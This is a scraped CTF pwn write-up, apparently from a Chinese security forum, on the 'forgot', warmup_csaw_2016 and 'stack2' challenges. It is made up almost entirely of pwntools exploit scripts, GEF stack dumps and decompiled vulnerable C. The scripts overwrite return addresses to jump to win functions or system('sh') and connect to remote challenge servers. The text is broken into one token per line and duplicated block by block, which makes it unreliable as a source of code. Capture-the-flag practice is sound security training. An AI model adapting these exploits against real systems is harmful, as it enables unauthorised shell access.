eax
*
4
+
0x30
]
0x8048a65
call eax
0x8048a67
mov eax, ds:
0x804b060
0x8048a6c
mov DWORD PTR [esp], eax
0x8048a6f
call
0x8048450
<fflush@plt>
0x8048a74
mov ebx, DWORD PTR [ebp
-
0x4
]
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "forgot", stopped 0x8048a61 in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x8048a61 → mov eax, DWORD PTR [esp+eax*4+0x30]
[
#1] 0xf7d57647 → __libc_start_main()
[
#2] 0x8048501 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
40
0xff885aa0
│
+
0x0000
:
0xff885ab0
→
0x41414141
← $esp
0xff885aa4
│
+
0x0004
:
0xff885ab0
→
0x41414141
0xff885aa8
│
+
0x0008
:
0xf7ef25a0
→
0xfbad2088
0xff885aac
│
+
0x000c
:
0x00000000
0xff885ab0
│
+
0x0010
:
0x41414141
0xff885ab4
│
+
0x0014
:
0x41414141
0xff885ab8
│
+
0x0018
:
0x41414141
0xff885abc
│
+
0x001c
:
0x41414141
0xff885ac0
│
+
0x0020
:
0x41414141
0xff885ac4
│
+
0x0024
:
0x41414141
0xff885ac8
│
+
0x0028
:
0x41414141
0xff885acc
│
+
0x002c
:
0x41414141
0xff885ad0
│
+
0x0030
:
0x080486cc
→ push ebp
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x8048a52
jb
0x80488cf
0x8048a58
sub DWORD PTR [esp
+
0x78
],
0x1
0x8048a5d
mov eax, DWORD PTR [esp
+
0x78
]
→
0x8048a61
mov eax, DWORD PTR [esp
+
eax
*
4
+
0x30
]
0x8048a65
call eax
0x8048a67
mov eax, ds:
0x804b060
0x8048a6c
mov DWORD PTR [esp], eax
0x8048a6f
call
0x8048450
<fflush@plt>
0x8048a74
mov ebx, DWORD PTR [ebp
-
0x4
]
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "forgot", stopped 0x8048a61 in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x8048a61 → mov eax, DWORD PTR [esp+eax*4+0x30]
[
#1] 0xf7d57647 → __libc_start_main()
[
#2] 0x8048501 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
40
0xff885aa0
│
+
0x0000
:
0xff885ab0
→
0x41414141
← $esp
0xff885aa4
│
+
0x0004
:
0xff885ab0
→
0x41414141
0xff885aa8
│
+
0x0008
:
0xf7ef25a0
→
0xfbad2088
0xff885aac
│
+
0x000c
:
0x00000000
0xff885ab0
│
+
0x0010
:
0x41414141
0xff885ab4
│
+
0x0014
:
0x41414141
0xff885ab8
│
+
0x0018
:
0x41414141
0xff885abc
│
+
0x001c
:
0x41414141
0xff885ac0
│
+
0x0020
:
0x41414141
0xff885ac4
│
+
0x0024
:
0x41414141
0xff885ac8
│
+
0x0028
:
0x41414141
0xff885acc
│
+
0x002c
:
0x41414141
0xff885ad0
│
+
0x0030
:
0x080486cc
→ push ebp
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
1
context.log_level
=
"DEBUG"
pwn_file
=
'./forgot'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'57736'
)
#---------------------------------------------------------
payload
=
'A'
*
8
*
4
+
p32(
0x80486CC
)
if
IS_LOCAL:
gdb.attach(io,
"break *0x8048A61\nc"
)
pause()
sa(
"> "
,
'noname\n'
)
sa(
"> "
,payload
+
'\n'
)
rv()
rv()
rv()
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
1
context.log_level
=
"DEBUG"
pwn_file
=
'./forgot'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'57736'
)
#---------------------------------------------------------
payload
=
'A'
*
8
*
4
+
p32(
0x80486CC
)
if
IS_LOCAL:
gdb.attach(io,
"break *0x8048A61\nc"
)
pause()
sa(
"> "
,
'noname\n'
)
sa(
"> "
,payload
+
'\n'
)
rv()
rv()
rv()
from
pwn
import
*
context.log_level
=
"DEBUG"
#io = process('./warmup_csaw_2016')
io
=
remote(
'node3.buuoj.cn'
,
'26740'
)
io.recv()
io.sendline(
'A'
*
0x48
+
p64(
0x40060d
))
io.recv()
from
pwn
import
*
context.log_level
=
"DEBUG"
#io = process('./warmup_csaw_2016')
io
=
remote(
'node3.buuoj.cn'
,
'26740'
)
io.recv()
io.sendline(
'A'
*
0x48
+
p64(
0x40060d
))
io.recv()
int
__cdecl main(
int
argc, const char
*
*
argv, const char
*
*
envp)
{
int
v3;
/
/
eax
unsigned
int
len
;
/
/
[esp
+
18h
] [ebp
-
90h
]
unsigned
int
choice;
/
/
[esp
+
1Ch
] [ebp
-
8Ch
]
int
num;
/
/
[esp
+
20h
] [ebp
-
88h
]
unsigned
int
index_j;
/
/
[esp
+
24h
] [ebp
-
84h
]
int
sum
;
/
/
[esp
+
28h
] [ebp
-
80h
]
unsigned
int
index;
/
/
[esp
+
2Ch
] [ebp
-
7Ch
]
unsigned
int
index_k;
/
/
[esp
+
30h
] [ebp
-
78h
]
unsigned
int
index_i;
/
/
[esp
+
34h
] [ebp
-
74h
]
char nums[
100
];
/
/
[esp
+
38h
] [ebp
-
70h
]
unsigned
int
v14;
/
/
[esp
+
9Ch
] [ebp
-
Ch]
v14
=
__readgsdword(
0x14u
);
setvbuf(stdin,
0
,
2
,
0
);
setvbuf(stdout,
0
,
2
,
0
);
sum
=
0
;
puts(
"***********************************************************"
);
puts(
"* An easy calc *"
);
puts(
"*Give me your numbers and I will return to you an average *"
);
puts(
"*(0 <= x < 256) *"
);
puts(
"***********************************************************"
);
puts(
"How many numbers you have:"
);
__isoc99_scanf(
"%d"
, &
len
);
puts(
"Give me your numbers"
);
for
( index
=
0
; index <
len
&& index <
=
99
;
+
+
index )
{
__isoc99_scanf(
"%d"
, &num);
nums[index]
=
num;
}
for
( index_j
=
len
; ; printf(
"average is %.2lf\n"
, (
sum
/
index_j)) )
{
while
(
1
)
{
while
(
1
)
{
while
(
1
)
{
puts(
"1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit"
);
__isoc99_scanf(
"%d"
, &choice);
if
( choice !
=
2
)
break
;
puts(
"Give me your number"
);
__isoc99_scanf(
"%d"
, &num);
if
( index_j <
=
99
)
{
v3
=
index_j
+
+
;
nums[v3]
=
num;
}
}
if
( choice >
2
)
break
;
if
( choice !
=
1
)
return
0
;
puts(
"id\t\tnumber"
);
for
( index_k
=
0
; index_k < index_j;
+
+
index_k )
printf(
"%d\t\t%d\n"
, index_k, nums[index_k]);
}
if
( choice !
=
3
)
break
;
puts(
"which number to change:"
);
__isoc99_scanf(
"%d"
, &
len
);
puts(
"new number:"
);
__isoc99_scanf(
"%d"
, &num);
nums[
len
]
=
num; \\ dangrous
}
if
( choice !
=
4
)
break
;
sum
=
0
;
for
( index_i
=
0
; index_i < index_j;
+
+
index_i )
sum
+
=
nums[index_i];
}
return
0
;
}
int
__cdecl main(
int
argc, const char
*
*
argv, const char
*
*
envp)
{
int
v3;
/
/
eax
unsigned
int
len
;
/
/
[esp
+
18h
] [ebp
-
90h
]
unsigned
int
choice;
/
/
[esp
+
1Ch
] [ebp
-
8Ch
]
int
num;
/
/
[esp
+
20h
] [ebp
-
88h
]
unsigned
int
index_j;
/
/
[esp
+
24h
] [ebp
-
84h
]
int
sum
;
/
/
[esp
+
28h
] [ebp
-
80h
]
unsigned
int
index;
/
/
[esp
+
2Ch
] [ebp
-
7Ch
]
unsigned
int
index_k;
/
/
[esp
+
30h
] [ebp
-
78h
]
unsigned
int
index_i;
/
/
[esp
+
34h
] [ebp
-
74h
]
char nums[
100
];
/
/
[esp
+
38h
] [ebp
-
70h
]
unsigned
int
v14;
/
/
[esp
+
9Ch
] [ebp
-
Ch]
v14
=
__readgsdword(
0x14u
);
setvbuf(stdin,
0
,
2
,
0
);
setvbuf(stdout,
0
,
2
,
0
);
sum
=
0
;
puts(
"***********************************************************"
);
puts(
"* An easy calc *"
);
puts(
"*Give me your numbers and I will return to you an average *"
);
puts(
"*(0 <= x < 256) *"
);
puts(
"***********************************************************"
);
puts(
"How many numbers you have:"
);
__isoc99_scanf(
"%d"
, &
len
);
puts(
"Give me your numbers"
);
for
( index
=
0
; index <
len
&& index <
=
99
;
+
+
index )
{
__isoc99_scanf(
"%d"
, &num);
nums[index]
=
num;
}
for
( index_j
=
len
; ; printf(
"average is %.2lf\n"
, (
sum
/
index_j)) )
{
while
(
1
)
{
while
(
1
)
{
while
(
1
)
{
puts(
"1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit"
);
__isoc99_scanf(
"%d"
, &choice);
if
( choice !
=
2
)
break
;
puts(
"Give me your number"
);
__isoc99_scanf(
"%d"
, &num);
if
( index_j <
=
99
)
{
v3
=
index_j
+
+
;
nums[v3]
=
num;
}
}
if
( choice >
2
)
break
;
if
( choice !
=
1
)
return
0
;
puts(
"id\t\tnumber"
);
for
( index_k
=
0
; index_k < index_j;
+
+
index_k )
printf(
"%d\t\t%d\n"
, index_k, nums[index_k]);
}
if
( choice !
=
3
)
break
;
puts(
"which number to change:"
);
__isoc99_scanf(
"%d"
, &
len
);
puts(
"new number:"
);
__isoc99_scanf(
"%d"
, &num);
nums[
len
]
=
num; \\ dangrous
}
if
( choice !
=
4
)
break
;
sum
=
0
;
for
( index_i
=
0
; index_i < index_j;
+
+
index_i )
sum
+
=
nums[index_i];
}
return
0
;
}
int
hackhere()
{
return
system(
"/bin/bash"
);
}
int
hackhere()
{
return
system(
"/bin/bash"
);
}
[DEBUG] Received
0x1c
bytes:
'sh: 1: /bin/bash: not found\n'
sh:
1
:
/
bin
/
bash:
not
found
[DEBUG] Received
0x1c
bytes:
'sh: 1: /bin/bash: not found\n'
sh:
1
:
/
bin
/
bash:
not
found
system(
'sh'
);
system(
'sh'
);
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
0
context.log_level
=
"DEBUG"
pwn_file
=
'./stack2'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'63716'
)
#---------------------------------------------------------
sa(
"How many numbers you have:"
,
'1\n'
)
rv()
sl(
'1'
)
win_addr
=
0x804859B
winaddrs
=
[
0x9B
,
0x85
,
0x04
,
0x08
]
bin_str_addr
=
0x08048987
str_addrs
=
[
0x87
,
0x89
,
0x04
,
0x08
]
system_plt
=
0x08048450
system_plt_addrs
=
[
0x50
,
0x84
,
0x04
,
0x08
]
if
IS_LOCAL:
gdb.attach(io,
"break *0x80488EE\nc"
)
pause()
#set ret addr
for
index
in
range
(
4
):
sa(
'5. exit\n'
,
'3\n'
)
sa(
'which number to change:\n'
,
str
(
0x84
+
index)
+
'\n'
)
sa(
'new number:\n'
,
str
(winaddrs[index])
+
'\n'
)
else
:
#set ret addr
for
index
in
range
(
4
):
sa(
'5. exit\n'
,
'3\n'
)
sa(
'which number to change:\n'
,
str
(
0x84
+
index)
+
'\n'
)
sa(
'new number:\n'
,
str
(system_plt_addrs[index])
+
'\n'
)
#set pointer to 'sh'
for
index
in
range
(
4
):
sa(
'5. exit\n'
,
'3\n'
)
sa(
'which number to change:\n'
,
str
(
0x84
+
8
+
index)
+
'\n'
)
sa(
'new number:\n'
,
str
(str_addrs[index])
+
'\n'
)
rv()
sl(
'5'
)
sconnect()
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
0
context.log_level
=
"DEBUG"
pwn_file
=
'./stack2'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'63716'
)
#---------------------------------------------------------
sa(
"How many numbers you have:"
,
'1\n'
)
rv()
sl(
'1'
)
win_addr
=
0x804859B
winaddrs
=
[
0x9B
,
0x85
,
0x04
,
0x08
]
bin_str_addr
=
0x08048987
str_addrs
=
[
0x87
,
0x89
,
0x04
,
0x08
]
system_plt
=
0x08048450
system_plt_addrs
=
[
0x50
,
0x84
,
0x04
,
0x08
]
if
IS_LOCAL:
gdb.attach(io,
"break *0x80488EE\nc"
)
pause()
#set ret addr
for
index
in
range
(
4
):
sa(
'5. exit\n'
,
'3\n'
)
sa(
'which number to change:\n'
,
str
(
0x84
+
index)
+
'\n'
)
sa(
'new number:\n'
,
str
(winaddrs[index])
+
'\n'
)
else
:
#set ret addr
for
index
in
range
(
4
):
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
- [原创][安全运维向]模拟搭建小型企业内网 14370
- 攻防世界-PWN-高手进阶区-难度3到4-全部题解 18982
- [原创]攻击格式化字符串在.bss段的程序(bugku-pwn6) 15325
- [原创]XCTF攻防世界-pwn新手练习区全部十题解析 14571
- [原创]KCTF2021 第二题 write up 5564